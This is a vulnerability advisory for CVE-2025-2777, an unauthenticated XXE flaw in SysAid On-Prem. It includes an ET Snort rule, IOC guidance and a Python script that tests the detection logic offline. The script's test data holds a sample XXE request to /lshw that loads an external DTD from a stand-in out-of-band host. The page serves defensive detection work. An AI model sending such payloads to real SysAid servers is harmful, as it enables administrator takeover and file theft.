CVE-2025-2777
published 2025-05-07


Priority: P193, critical, 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: ITW EXPLOIT, VulnCheck KEV, Initial access
Exploited in the wild
EPSS: 79.13% (99.6th percentile)
SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives.

Affected (2 ranges)

Vendor   Product          Version range   Fixed in
sysaid   sysaid           <= 23.3.40
sysaid   sysaid_on-prem   <= 23.3.40

Detection & IOCs (extracted from sources)

url: /lshw
bytes: |3c 21|ENTITY|20 25|
snort:
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS SysAid On-Prem lshw XML External Entity Injection (CVE-2025-2777)"; flow:established,to_server; http.uri; content:"/lshw"; startswith; http.request_body; content:"|3c 21|ENTITY|20 25|"; fast_pattern; content:"SYSTEM"; distance:0; http.method; content:"POST"; reference:url,labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/; reference:cve,2025-2777; classtype:web-application-attack; sid:2066205; rev:1; metadata:affected_product SysAid, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_09, cve CVE_2025_2777, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2025_12_09, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • XXE payload in the POST body contains a DOCTYPE with a parameter entity declaration using SYSTEM keyword; detect the byte sequence 0x3C 0x21 ('<!') followed by 'ENTITY %' in the request body.
  • Out-of-band XXE exfiltration triggers an outbound HTTP callback from the SysAid server with a Java User-Agent; monitor egress HTTP traffic from SysAid hosts for User-Agent strings containing 'Java'.
  • The interactsh/OOB detection template confirms exploitation via an HTTP interaction on the interactsh protocol channel, indicating DNS/HTTP callback-based XXE exfiltration is the primary exploitation technique.
  • Successful exploitation leads to administrator account takeover and arbitrary file read; investigate SysAid admin account creation or privilege changes following any /lshw POST alert.
  • Snort/Suricata SID 2066205 (ET rule) covers this CVE; ensure TLS inspection (SSLDecrypt) is enabled on perimeter and internal sensors as the rule metadata flags tls_state TLSDecrypt.
  • Affected versions are SysAid On-Prem only (<= 23.3.40); cloud/SaaS deployments are not in scope, and this rule should not be applied to SysAid cloud traffic.
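The two detections listed above (the `/lshw` POST-body pattern from the ET rule, and the outbound Java User-Agent check) can be exercised offline before deploying a sensor rule. The following is an added example written for this page, not code from Emerging Threats, SysAid, or watchTowr: it mirrors the rule's match conditions (POST method, URI starting with `/lshw`, `<!ENTITY %` in the body followed by `SYSTEM`) over constructed HTTP requests, and scans constructed proxy log lines for Java User-Agent egress from a SysAid host. Host addresses, URLs, and the log format are assumptions chosen for illustration.

```python
# Offline check of the CVE-2025-2777 detection logic (added example, not the page's own code).
# Patterns come from the ET rule on this page: '<!ENTITY %' (bytes 3c 21 ... 20 25) then 'SYSTEM'.
ENTITY_DECL = b"<!ENTITY %"

# Constructed sample HTTP/1.1 requests; hosts and URLs are placeholders.
SAMPLE_REQUESTS = {
    "xxe_post": (
        b"POST /lshw HTTP/1.1\r\nHost: sysaid.example.internal\r\n"
        b"Content-Type: application/xml\r\n\r\n"
        b'<?xml version="1.0"?><!DOCTYPE x [<!ENTITY % ext SYSTEM '
        b'"http://oob.example.invalid/p.dtd"> %ext;]><lshw/>'
    ),
    "benign_post": (
        b"POST /lshw HTTP/1.1\r\nHost: sysaid.example.internal\r\n\r\n"
        b'<lshw><node id="x"/></lshw>'
    ),
    "xxe_wrong_path": (
        b"POST /other HTTP/1.1\r\nHost: h\r\n\r\n"
        b'<!DOCTYPE x [<!ENTITY % e SYSTEM "http://oob.example.invalid/p.dtd">]>'
    ),
    "xxe_get": b"GET /lshw HTTP/1.1\r\nHost: h\r\n\r\n",
}

# Constructed proxy log lines: "<src_ip> <method> <url> <user_agent>".
EGRESS_LOG = [
    "10.0.5.10 GET http://oob.example.invalid/p.dtd Java/11.0.2",
    "10.0.5.10 GET https://update.example.com/ SysAidUpdater/1.0",
    "10.0.7.3 GET http://intranet.example/ Java/17",
]
SYSAID_HOSTS = {"10.0.5.10"}  # assumed address of the SysAid On-Prem server


def parse_http_request(raw: bytes):
    """Split a raw HTTP/1.x request into (method, uri, headers, body); None if malformed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None
    lines = head.split(b"\r\n")
    try:
        method, uri, _version = lines[0].split(b" ", 2)
    except ValueError:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return method, uri, headers, body


def matches_cve_2025_2777(raw: bytes) -> bool:
    """Apply the ET rule's conditions: POST, URI startswith /lshw, '<!ENTITY %' then 'SYSTEM' after it."""
    parsed = parse_http_request(raw)
    if parsed is None:
        return False
    method, uri, _headers, body = parsed
    if method != b"POST" or not uri.startswith(b"/lshw"):
        return False
    idx = body.find(ENTITY_DECL)
    if idx < 0:
        return False
    # 'distance:0' in the rule: SYSTEM must appear after the entity declaration match.
    return body.find(b"SYSTEM", idx + len(ENTITY_DECL)) >= 0


def scan_requests(samples: dict) -> list:
    """Return the names of the sample requests that trigger the detection."""
    return [name for name, raw in samples.items() if matches_cve_2025_2777(raw)]


def flag_java_egress(lines: list, sysaid_hosts: set) -> list:
    """Return (src_ip, url) for outbound requests from SysAid hosts with a Java User-Agent."""
    hits = []
    for line in lines:
        parts = line.split(" ", 3)
        if len(parts) != 4:
            continue  # skip malformed log lines rather than crash the scan
        src, _method, url, user_agent = parts
        if src in sysaid_hosts and "Java" in user_agent:
            hits.append((src, url))
    return hits


if __name__ == "__main__":
    print("request hits:", scan_requests(SAMPLE_REQUESTS))
    print("egress hits:", flag_java_egress(EGRESS_LOG, SYSAID_HOSTS))
```

Only the POST to `/lshw` carrying the parameter-entity declaration is flagged; the same payload on another path, a GET, and a well-formed `lshw` document are not, which matches the rule's `startswith`, `http.method` and `distance:0` constraints. The egress check is deliberately narrow (SysAid hosts only), so it will not fire on other Java-based clients in the estate.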

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.3 CRITICAL